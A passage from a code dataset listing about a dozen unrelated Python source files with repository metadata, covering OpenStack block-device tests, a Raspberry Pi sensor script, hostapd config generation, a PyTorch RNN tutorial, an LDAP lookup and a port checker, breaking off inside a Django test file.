repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
tchakravarty/PythonExamples
|
Code/Miscellaneous/distribution_object_graph.py
|
1
|
1713
|
# ==============================================================================
# purpose: create statistical distribution objects, and find shortest paths
# author:
# created: 6/6/15
# revised:
# comments:
# 1. This is based on the object graph on Wikipedia.
# 2. The idea is to create a graph of the various continuous statistical distributions,
# plot them, and traverse the graph to find the shortest distance paths.
# 3. Could use the Python module objgraph to do this, where the nodes are the distributions
# but inheritance is the only relationship here, so cannot have the relationships that we need
# such as deterministic relationships, and approximate relationships.
# 4. How does an ontology fit into the picture.
#==============================================================================
import scipy.stats as sps
import math
class StatisticalDistribution(object):
def __init__(self):
pass
def compute_percentile(self, percentile):
pass
class NormalDistribution(StatisticalDistribution):
def __init__(self, mean=0, var=1):
self.mean = mean
self.var = var
def compute_percentile(self, percentile=0.5):
rv = sps.norm(loc=self.mean, scale=math.sqrt(self.var))
return rv.ppf(percentile)
class LogNormalDistribution(StatisticalDistribution):
def __init__(self, mean=0, var=1):
self.mean = mean
self.var = var
def compute_percentile(self, percentile=0.5):
rv = sps.lognorm(s=math.sqrt(self.var), scale=math.exp(self.mean))
return rv.ppf(percentile)
x = NormalDistribution(mean=3, var=4)
x.compute_percentile()
y = LogNormalDistribution(mean=3, var=4)
y.compute_percentile()
|
apache-2.0
| 154,036,799,461,104,830 | 30.722222 | 96 | 0.640981 | false |
HybridF5/jacket
|
jacket/tests/compute/unit/api/openstack/compute/test_block_device_mapping_v1.py
|
1
|
17001
|
# Copyright (c) 2014 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from mox3 import mox
from oslo_config import cfg
from oslo_serialization import jsonutils
from webob import exc
from jacket.api.compute.openstack.compute import block_device_mapping_v1 \
as block_device_mapping
from jacket.api.compute.openstack.compute import extension_info
from jacket.api.compute.openstack.compute.legacy_v2 import extensions
from jacket.api.compute.openstack.compute.legacy_v2 import servers as servers_v2
from jacket.api.compute.openstack.compute import servers as servers_v21
from jacket.compute.cloud import api as compute_api
from jacket.db import compute
from jacket.compute import exception
from jacket.compute import test
from jacket.tests.compute.unit.api.openstack import fakes
from jacket.tests.compute.unit.image import fake
CONF = cfg.CONF
class BlockDeviceMappingTestV21(test.TestCase):
validation_error = exception.ValidationError
def _setup_controller(self):
ext_info = extension_info.LoadedExtensionInfo()
CONF.set_override('extensions_blacklist', 'os-block-device-mapping',
'osapi_v21')
self.controller = servers_v21.ServersController(
extension_info=ext_info)
CONF.set_override('extensions_blacklist',
['os-block-device-mapping-v1',
'os-block-device-mapping'],
'osapi_v21')
self.no_volumes_controller = servers_v21.ServersController(
extension_info=ext_info)
CONF.set_override('extensions_blacklist', '', 'osapi_v21')
def setUp(self):
super(BlockDeviceMappingTestV21, self).setUp()
self._setup_controller()
fake.stub_out_image_service(self)
self.volume_id = fakes.FAKE_UUID
self.bdm = [{
'no_device': None,
'virtual_name': 'root',
'volume_id': self.volume_id,
'device_name': 'vda',
'delete_on_termination': False
}]
def _get_servers_body(self, no_image=False):
body = {
'server': {
'name': 'server_test',
'imageRef': '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
'flavorRef': 'http://localhost/123/flavors/3',
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
if no_image:
del body['server']['imageRef']
return body
def _test_create(self, params, no_image=False, override_controller=None):
body = self._get_servers_body(no_image)
body['server'].update(params)
req = fakes.HTTPRequest.blank('/v2/fake/servers')
req.method = 'POST'
req.headers['content-type'] = 'application/json'
req.body = jsonutils.dump_as_bytes(body)
if override_controller:
override_controller.create(req, body=body).obj['server']
else:
self.controller.create(req, body=body).obj['server']
def test_create_instance_with_volumes_enabled(self):
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm', _validate_bdm)
self._test_create(params)
def test_create_instance_with_volumes_enabled_and_bdms_no_image(self):
"""Test that the create works if there is no image supplied but
os-volumes extension is enabled and bdms are supplied
"""
self.mox.StubOutWithMock(compute_api.API, '_validate_bdm')
self.mox.StubOutWithMock(compute_api.API, '_get_bdm_image_metadata')
volume = {
'id': 1,
'status': 'active',
'volume_image_metadata':
{'test_key': 'test_value'}
}
compute_api.API._validate_bdm(mox.IgnoreArg(),
mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(True)
compute_api.API._get_bdm_image_metadata(mox.IgnoreArg(),
self.bdm,
True).AndReturn(volume)
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
self.assertNotIn('imageRef', kwargs)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.mox.ReplayAll()
self._test_create(params, no_image=True)
def test_create_instance_with_volumes_disabled(self):
bdm = [{'device_name': 'foo'}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertNotIn(block_device_mapping, kwargs)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create(params,
override_controller=self.no_volumes_controller)
@mock.patch('compute.compute.api.API._get_bdm_image_metadata')
def test_create_instance_non_bootable_volume_fails(self, fake_bdm_meta):
bdm = [{
'volume_id': self.volume_id,
'device_name': 'vda'
}]
params = {'block_device_mapping': bdm}
fake_bdm_meta.side_effect = exception.InvalidBDMVolumeNotBootable(id=1)
self.assertRaises(exc.HTTPBadRequest,
self._test_create, params, no_image=True)
def test_create_instance_with_device_name_not_string(self):
self.bdm[0]['device_name'] = 123
old_create = compute_api.API.create
self.params = {'block_device_mapping': self.bdm}
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, self.params)
def test_create_instance_with_snapshot_volume_id_none(self):
old_create = compute_api.API.create
bdm = [{
'no_device': None,
'snapshot_id': None,
'volume_id': None,
'device_name': 'vda',
'delete_on_termination': False
}]
self.params = {'block_device_mapping': bdm}
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, self.params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_with_bdm_param_not_list(self, mock_create):
self.params = {'block_device_mapping': '/dev/vdb'}
self.assertRaises(self.validation_error,
self._test_create, self.params)
def test_create_instance_with_device_name_empty(self):
self.bdm[0]['device_name'] = ''
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def test_create_instance_with_device_name_too_long(self):
self.bdm[0]['device_name'] = 'a' * 256,
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def test_create_instance_with_space_in_device_name(self):
self.bdm[0]['device_name'] = 'vd a',
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertTrue(kwargs['legacy_bdm'])
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def _test_create_instance_with_size_error(self, size):
bdm = [{'delete_on_termination': True,
'device_name': 'vda',
'volume_size': size,
'volume_id': '11111111-1111-1111-1111-111111111111'}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def test_create_instance_with_invalid_size(self):
self._test_create_instance_with_size_error("hello world")
def test_create_instance_with_size_empty_string(self):
self._test_create_instance_with_size_error('')
def test_create_instance_with_size_zero(self):
self._test_create_instance_with_size_error("0")
def test_create_instance_with_size_greater_than_limit(self):
self._test_create_instance_with_size_error(compute.MAX_INT + 1)
def test_create_instance_with_bdm_delete_on_termination(self):
bdm = [{'device_name': 'foo1', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': 'True'},
{'device_name': 'foo2', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True},
{'device_name': 'foo3', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': 'invalid'},
{'device_name': 'foo4', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False},
{'device_name': 'foo5', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False}]
expected_bdm = [
{'device_name': 'foo1', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True},
{'device_name': 'foo2', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True},
{'device_name': 'foo3', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False},
{'device_name': 'foo4', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False},
{'device_name': 'foo5', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(expected_bdm, kwargs['block_device_mapping'])
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm', _validate_bdm)
self._test_create(params)
def test_create_instance_decide_format_legacy(self):
ext_info = extension_info.LoadedExtensionInfo()
CONF.set_override('extensions_blacklist',
['os-block-device-mapping',
'os-block-device-mapping-v1'],
'osapi_v21')
controller = servers_v21.ServersController(extension_info=ext_info)
bdm = [{'device_name': 'foo1',
'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True}]
expected_legacy_flag = True
old_create = compute_api.API.create
def create(*args, **kwargs):
legacy_bdm = kwargs.get('legacy_bdm', True)
self.assertEqual(legacy_bdm, expected_legacy_flag)
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm',
_validate_bdm)
self._test_create({}, override_controller=controller)
params = {'block_device_mapping': bdm}
self._test_create(params, override_controller=controller)
def test_create_instance_both_bdm_formats(self):
ext_info = extension_info.LoadedExtensionInfo()
CONF.set_override('extensions_blacklist', '', 'osapi_v21')
both_controllers = servers_v21.ServersController(
extension_info=ext_info)
bdm = [{'device_name': 'foo'}]
bdm_v2 = [{'source_type': 'volume',
'uuid': 'fake_vol'}]
params = {'block_device_mapping': bdm,
'block_device_mapping_v2': bdm_v2}
self.assertRaises(exc.HTTPBadRequest, self._test_create, params,
override_controller=both_controllers)
class BlockDeviceMappingTestV2(BlockDeviceMappingTestV21):
validation_error = exc.HTTPBadRequest
def _setup_controller(self):
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {'os-volumes': 'fake'}
self.controller = servers_v2.Controller(self.ext_mgr)
self.ext_mgr_no_vols = extensions.ExtensionManager()
self.ext_mgr_no_vols.extensions = {}
self.no_volumes_controller = servers_v2.Controller(
self.ext_mgr_no_vols)
def test_create_instance_with_volumes_disabled(self):
bdm = [{'device_name': 'foo'}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertIsNone(kwargs['block_device_mapping'])
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create(params,
override_controller=self.no_volumes_controller)
def test_create_instance_decide_format_legacy(self):
ext_mgr = extensions.ExtensionManager()
ext_mgr.extensions = {'os-volumes': 'fake',
'os-block-device-mapping-v2-boot': 'fake'}
controller = servers_v2.Controller(self.ext_mgr)
bdm = [{'device_name': 'foo1',
'volume_id': fakes.FAKE_UUID,
'delete_on_termination': 1}]
expected_legacy_flag = True
old_create = compute_api.API.create
def create(*args, **kwargs):
legacy_bdm = kwargs.get('legacy_bdm', True)
self.assertEqual(legacy_bdm, expected_legacy_flag)
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm',
_validate_bdm)
self._test_create({}, override_controller=controller)
params = {'block_device_mapping': bdm}
self._test_create(params, override_controller=controller)
def test_create_instance_with_size_empty_string(self):
# Add a check whether the size is an empty string
# in V2.1 API only. So this test is skipped in V2.0 API
pass
def test_create_instance_with_size_zero(self):
# Add a check whether the size is zero in V2.1 API only.
# So this test is skipped in V2.0 API
pass
def test_create_instance_with_size_greater_than_limit(self):
# Add a check whether size is greater than the limit
# in V2.1 API only. So this test is skipped in V2.0 API
pass
|
apache-2.0
| -7,537,596,891,134,087,000 | 39.096698 | 80 | 0.593553 | false |
cormoran/RaspberryPi
|
tests/Others/ultrasonicsensor.py
|
1
|
3633
|
#!/usr/bin/python
import time
import RPi.GPIO as GPIO
# remember to change the GPIO values below to match your sensors
# GPIO output = the pin that's connected to "Trig" on the sensor
# GPIO input = the pin that's connected to "Echo" on the sensor
def reading(sensor):
# Disable any warning message such as GPIO pins in use
GPIO.setwarnings(False)
# use the values of the GPIO pins, and not the actual pin number
# so if you connect to GPIO 25 which is on pin number 22, the
# reference in this code is 25, which is the number of the GPIO
# port and not the number of the physical pin
GPIO.setmode(GPIO.BCM)
if sensor == 0:
# point the software to the GPIO pins the sensor is using
# change these values to the pins you are using
# GPIO output = the pin that's connected to "Trig" on the sensor
# GPIO input = the pin that's connected to "Echo" on the sensor
GPIO.setup(17,GPIO.OUT)
GPIO.setup(27,GPIO.IN)
GPIO.output(17, GPIO.LOW)
# found that the sensor can crash if there isn't a delay here
# no idea why. If you have odd crashing issues, increase delay
time.sleep(0.3)
# sensor manual says a pulse ength of 10Us will trigger the
# sensor to transmit 8 cycles of ultrasonic burst at 40kHz and
# wait for the reflected ultrasonic burst to be received
# to get a pulse length of 10Us we need to start the pulse, then
# wait for 10 microseconds, then stop the pulse. This will
# result in the pulse length being 10Us.
# start the pulse on the GPIO pin
# change this value to the pin you are using
# GPIO output = the pin that's connected to "Trig" on the sensor
GPIO.output(17, True)
# wait 10 micro seconds (this is 0.00001 seconds) so the pulse
# length is 10Us as the sensor expects
time.sleep(0.00001)
# stop the pulse after the time above has passed
# change this value to the pin you are using
# GPIO output = the pin that's connected to "Trig" on the sensor
GPIO.output(17, False)
# listen to the input pin. 0 means nothing is happening. Once a
# signal is received the value will be 1 so the while loop
# stops and has the last recorded time the signal was 0
# change this value to the pin you are using
# GPIO input = the pin that's connected to "Echo" on the sensor
while GPIO.input(27) == 0:
signaloff = time.time()
# listen to the input pin. Once a signal is received, record the
# time the signal came through
# change this value to the pin you are using
# GPIO input = the pin that's connected to "Echo" on the sensor
while GPIO.input(27) == 1:
signalon = time.time()
# work out the difference in the two recorded times above to
# calculate the distance of an object in front of the sensor
timepassed = signalon - signaloff
# we now have our distance but it's not in a useful unit of
# measurement. So now we convert this distance into centimetres
distance = timepassed * 17000
# return the distance of an object in front of the sensor in cm
return distance
# we're no longer using the GPIO, so tell software we're done
GPIO.cleanup()
else:
print "Incorrect usonic() function varible."
while 1:
print reading(0)
time.sleep(0.5)
|
gpl-2.0
| -2,685,730,067,043,373,600 | 39.366667 | 72 | 0.629783 | false |
smarttang/baseline_testing
|
plugins/t_varfile_mod.py
|
1
|
1129
|
#coding:utf-8
import re
import commands
###################################
#
# 测试系统日志是否做了权限限制
#
####################################
class TvarfileMod:
global results,sorce
results=[]
sorce=60
def setBaseline_main(self,baseline_main):
self.baseline_main=baseline_main
def start(self):
print "[*] Checking TvarfileMod!!"
check_list=['/var/log/message','/var/log/secure','/var/log/maillog','/var/log/cron','/var/log/spooler','/var/log/boot.log']
try:
for item in check_list:
if os.path.exists(item):
test_com=commands.getoutput("ls -l "+item).split(" ")
if not test_com[0]=="-rw-r-----":
sorce=sorce-10
results.append({item:test_com[0]})
except:
pass
# print self.baseline_main.output_name
def save(self):
if sorce<60:
self.baseline_main.xml_result({"mod_id":"37wan-centOS-06","mod_name":"TvarfileMod","status":"1","results":str(results)})
else:
self.baseline_main.xml_result({"mod_id":"37wan-centOS-06","mod_name":"TvarfileMod","status":"0","results":"null"})
print "[*] TvarfileMod Finish!"
def getPluginClass():
return TvarfileMod
|
gpl-2.0
| 6,226,643,696,517,116,000 | 26.525 | 125 | 0.624886 | false |
nims11/hostapd.py
|
config_hostapd.py
|
1
|
1849
|
#!/usr/bin/env python2.7
from common_methods import exit_script, display_usage, exit_error
import sys, os
import config
import config_gen
def generate_confs():
"""
For each section generate config files if TEMPLATE_CONFIG is present into OUTPUT_CONFIG
Exception for HOSTAPD as it may have many variables which is not intended to be specified through TEMPLATE_CONFIG
"""
global_config = config_gen.get_config()
for section in global_config.keys():
if global_config[section].has_key('TEMPLATE_CONFIG'):
if not global_config[section].has_key('OUTPUT_CONFIG'):
exit_error("[ERROR] 'OUTPUT_CONFIG' not specified for '" + section + "'")
template_file = global_config[section]['TEMPLATE_CONFIG']
template_str = ''
try:
with open(template_file) as f:
template_str = f.read()
except:
exit_error("[ERROR] Template File for '" + section + "', " + template_file + " does not exist")
for key, val in global_config[section].items():
template_str = template_str.replace('$' + key + '$', val)
try:
with open(global_config[section]['OUTPUT_CONFIG'], 'wb') as f:
print 'Writing', f.name, '...'
f.write(template_str)
except:
exit_error("[ERROR] Failed to open output_config '" + global_config[section]['OUTPUT_CONFIG'] + "' in write mode")
elif section == 'HOSTAPD':
write_hostapd_conf(global_config)
def write_hostapd_conf(global_config):
config_output = global_config['HOSTAPD']['OUTPUT_CONFIG']
print 'Writing', config_output, '...'
try:
with open(config_output, 'w') as f:
for key, val in global_config['HOSTAPD'].items():
if key not in config.special_options:
f.write( key + '=' + val + '\n' )
except:
exit_error('[ERROR] Failed to open ' + config_output + ' in write mode')
def test():
config_gen.init()
generate_confs()
if __name__ == '__main__':
test()
|
mit
| 3,153,232,477,062,764,000 | 35.254902 | 118 | 0.667929 | false |
apple/swift-lldb
|
packages/Python/lldbsuite/test/lang/swift/metatype/TestSwiftMetatype.py
|
1
|
1815
|
# TestSwiftMetatype.py
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ------------------------------------------------------------------------------
"""
Test the formatting of Swift metatypes
"""
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
import lldbsuite.test.lldbutil as lldbutil
import os
import unittest2
class TestSwiftMetatype(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@swiftTest
def test_metatype(self):
"""Test the formatting of Swift metatypes"""
self.build()
target, process, thread, bkpt = lldbutil.run_to_source_breakpoint(
self, 'Set breakpoint here', lldb.SBFileSpec('main.swift'))
frame = thread.frames[0]
self.assertTrue(frame, "Frame 0 is valid.")
var_s = frame.FindVariable("s")
var_c = frame.FindVariable("c")
var_f = frame.FindVariable("f")
var_t = frame.FindVariable("t")
var_p = frame.FindVariable("p")
lldbutil.check_variable(self, var_s, False, "String")
lldbutil.check_variable(self, var_c, False, "a.D")
lldbutil.check_variable(self, var_f, False, "(Int) -> Int")
lldbutil.check_variable(self, var_t, False, "(Int, Int, String)")
lldbutil.check_variable(self, var_p, False, "a.P")
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lldb.SBDebugger.Terminate)
unittest2.main()
|
apache-2.0
| -4,033,874,331,155,257,000 | 32 | 80 | 0.639118 | false |
JoseTomasTocino/SiteUp
|
web/siteup_checker/monitoring/pport.py
|
1
|
1113
|
import socket
import logging
logger = logging.getLogger("debugging")
def check_port(host, port_number, content=None):
logger.info(u"Port check, host: %s, port: %s, content: '%s'" % (host, port_number, content))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
# connect_ex returns an error number instead of raising an exception... in theory
try:
result = s.connect_ex((host, port_number))
except Exception as e:
logger.error(u"Error: %s" % e)
return {'valid': False}
logger.info(u"Port check, connection errno: %i" % result)
if result == 0:
ret_obj = {'status_ok': True, 'valid': True}
if content:
try:
recv_content = s.recv(512)
except Exception as e:
logger.error(u"Error: %s" % e)
return {'valid': False}
logger.info(u"Received: %s" % recv_content)
if content.lower() not in recv_content.lower():
ret_obj['status_ok'] = False
return ret_obj
else:
return {'valid': False}
|
gpl-2.0
| -2,188,741,097,909,394,000 | 26.825 | 96 | 0.57053 | false |
JudgeGregg/Redmine-Importer
|
redmine_ldap.py
|
1
|
1337
|
#-*- encoding: utf8 -*-
"""Retrieve user id from ldap server."""
import logging
import sys
logging.basicConfig(level=logging.INFO)
LOGGER = logging.getLogger(__name__)
try:
import ldap
except ImportError, exception:
LOGGER.error(str(exception))
sys.exit()
LDAP_SERVER_URL = 'ldap://directory.lvl.intranet'
LDAP_QUERY = 'uid={},ou=smile,ou=users,dc=smile,dc=fr'
def get_user_id_from_ldap(pentagram, ldap_url=LDAP_SERVER_URL,
ldap_query=LDAP_QUERY):
"""Get user id from pentagram.
:pentagram: pentagram: string
:returns: user_id: string
"""
if not len(pentagram) == 5:
LOGGER.error('Invalid user name, skipping...')
return None
try:
ldap_server = ldap.initialize(ldap_url)
ldap_server.simple_bind()
except ldap.LDAPError:
LOGGER.error('Error while connecting to LDAP server, skipping...')
return None
try:
results = ldap_server.search_s(
ldap_query.format(pentagram), ldap.SCOPE_SUBTREE,
attrlist=['uidNumber'])
except ldap.NO_SUCH_OBJECT:
LOGGER.error('No match found, skipping...')
return None
if not len(results) == 1:
LOGGER.error('Too many users matching, skipping...')
return None
_, arr = results[0]
return arr['uidNumber'][0]
|
gpl-3.0
| -7,550,749,679,225,353,000 | 27.446809 | 74 | 0.624533 | false |
yunjey/pytorch-tutorial
|
tutorials/02-intermediate/recurrent_neural_network/main.py
|
1
|
3536
|
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
sequence_length = 28
input_size = 28
hidden_size = 128
num_layers = 2
num_classes = 10
batch_size = 100
num_epochs = 2
learning_rate = 0.01
# MNIST dataset
train_dataset = torchvision.datasets.MNIST(root='../../data/',
train=True,
transform=transforms.ToTensor(),
download=True)
test_dataset = torchvision.datasets.MNIST(root='../../data/',
train=False,
transform=transforms.ToTensor())
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=True)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
# Recurrent neural network (many-to-one)
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, num_classes):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True)
self.fc = nn.Linear(hidden_size, num_classes)
def forward(self, x):
# Set initial hidden and cell states
h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)
c0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)
# Forward propagate LSTM
out, _ = self.lstm(x, (h0, c0)) # out: tensor of shape (batch_size, seq_length, hidden_size)
# Decode the hidden state of the last time step
out = self.fc(out[:, -1, :])
return out
model = RNN(input_size, hidden_size, num_layers, num_classes).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Train the model
total_step = len(train_loader)
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
images = images.reshape(-1, sequence_length, input_size).to(device)
labels = labels.to(device)
# Forward pass
outputs = model(images)
loss = criterion(outputs, labels)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# Test the model
model.eval()
with torch.no_grad():
correct = 0
total = 0
for images, labels in test_loader:
images = images.reshape(-1, sequence_length, input_size).to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Test Accuracy of the model on the 10000 test images: {} %'.format(100 * correct / total))
# Save the model checkpoint
torch.save(model.state_dict(), 'model.ckpt')
|
mit
| -4,303,049,334,710,658,000 | 33.339806 | 101 | 0.573247 | false |
lopiola/cowboys_ai
|
src/supervised_learning/network.py
|
1
|
2137
|
#!/usr/bin/env python
# coding=utf-8
from pybrain.tools.shortcuts import buildNetwork
from pybrain.supervised.trainers import BackpropTrainer
from src.supervised_learning import dataset
from math import sqrt
import cPickle as pickle
def build(input_size, hidden_size, target_size):
return buildNetwork(input_size, hidden_size, target_size, bias=True)
def train(network, dataset, epochs):
trainer = BackpropTrainer(network, dataset)
# trainer.trainUntilConvergence(verbose=True)
#
for i in range(epochs):
mse = trainer.train()
rmse = sqrt(mse)
print "training RMSE, epoch {}: {}".format(i + 1, rmse)
def load_from_file(filename):
network = None
with open(filename, 'r') as pickle_file:
network = pickle.load(pickle_file)
return network
def save_to_file(filename, network):
pickle.dump(network, open(filename, 'wb'))
def train_and_save(input_size,
output_size,
hidden_size,
training_epochs,
network_filename,
dataset_filename):
network = build(input_size, hidden_size, output_size)
ds = dataset.load_from_file(dataset_filename)
train(network, ds, training_epochs)
save_to_file(network_filename, network)
def rnd_config():
return {
"network_filename": "network/rnd_net.pickle",
"dataset_filename": "datasets/rnd.data",
}
def best_avg_config():
return {
"network_filename": "network/best_avg_net.pickle",
"dataset_filename": "datasets/best_avg.data",
}
def thinking_config():
return {
"network_filename": "network/thinking_net.pickle",
"dataset_filename": "datasets/thinking.data",
}
def mixed_config():
return {
"network_filename": "network/mixed_net.pickle",
"dataset_filename": "datasets/mixed.data",
}
if __name__ == '__main__':
input_size = 9
output_size = 1
hidden_size = 15
training_epochs = 200
train_and_save(
input_size,
output_size,
hidden_size,
training_epochs,
**mixed_config())
|
mit
| 3,967,700,485,640,788,000 | 26.050633 | 72 | 0.627515 | false |
stereoboy/object_detection
|
utils.py
|
1
|
1635
|
import tensorflow as tf
import numpy as np
from PIL import Image
import os
def maybe_download(directory, filename, url):
print('Try to dwnloaded', url)
if not tf.gfile.Exists(directory):
tf.gfile.MakeDirs(directory)
filepath = os.path.join(directory, filename)
if not tf.gfile.Exists(filepath):
filepath, _ = urllib.request.urlretrieve(url, filepath)
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
return filepath
def load_pretrained(filepath):
return np.load(filepath, encoding='bytes').item()
def get_epoch():
epoch_step = tf.Variable(0, name='epoch_step', trainable=False)
epoch_update = epoch_step.assign(epoch_step + 1)
return epoch_step, epoch_update
def load_imgs(train_img_dir, filelist):
def load_img(path):
_img = Image.open(path)
img = np.array(_img)
_img.close()
return img
_imgs = [os.path.join(train_img_dir, filename + ".png") for filename in filelist]
imgs = [load_img(_img) for _img in _imgs]
return imgs
def load_annots(train_annot_dir, filelist):
def load_annot(path):
#print(path)
annot = np.load(path, encoding='bytes')
#print("original dims: {}x{}".format(annot[0,0], annot[0,1]))
return annot
_annots = [os.path.join(train_annot_dir, filename + ".npy") for filename in filelist]
annots = [load_annot(_annot) for _annot in _annots]
return annots
def tf_Print(on, x, summarize=50, message=""):
if on:
x = tf.Print(x, [x, tf.shape(x)], summarize=summarize, message=message)
return x
def debug_print(on, *x):
if on:
print(x)
return x
|
mit
| -3,746,810,476,708,794,000 | 26.25 | 87 | 0.674618 | false |
dstl/ideaworks
|
backend/ideaworks/projectsapp/tests/project_tests.py
|
1
|
112560
|
# (c) Crown Copyright 2014 Defence Science and Technology Laboratory UK
# Author: Rich Brantingham
import copy
import time
import json
import urlparse
import datetime
from xml.dom.minidom import parseString
from xml.parsers.expat import ExpatError
from django.test import TestCase
from django.core import urlresolvers
from django.test import client
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from registration.models import RegistrationProfile
from tastypie_mongoengine import test_runner
import projectsapp.documents as documents
from projectsapp import api
from projectsapp import api_functions
class Test_Authentication_Base(test_runner.MongoEngineTestCase):
"""
Base class to handle functions common throughout tests
"""
api_name = 'v1'
c = client.Client()
def get_meta_and_objects(self, response):
content = json.loads(response.content)
return content['meta'], content['objects']
""" User Handling Functions """
def resourceListURI(self, resource_name):
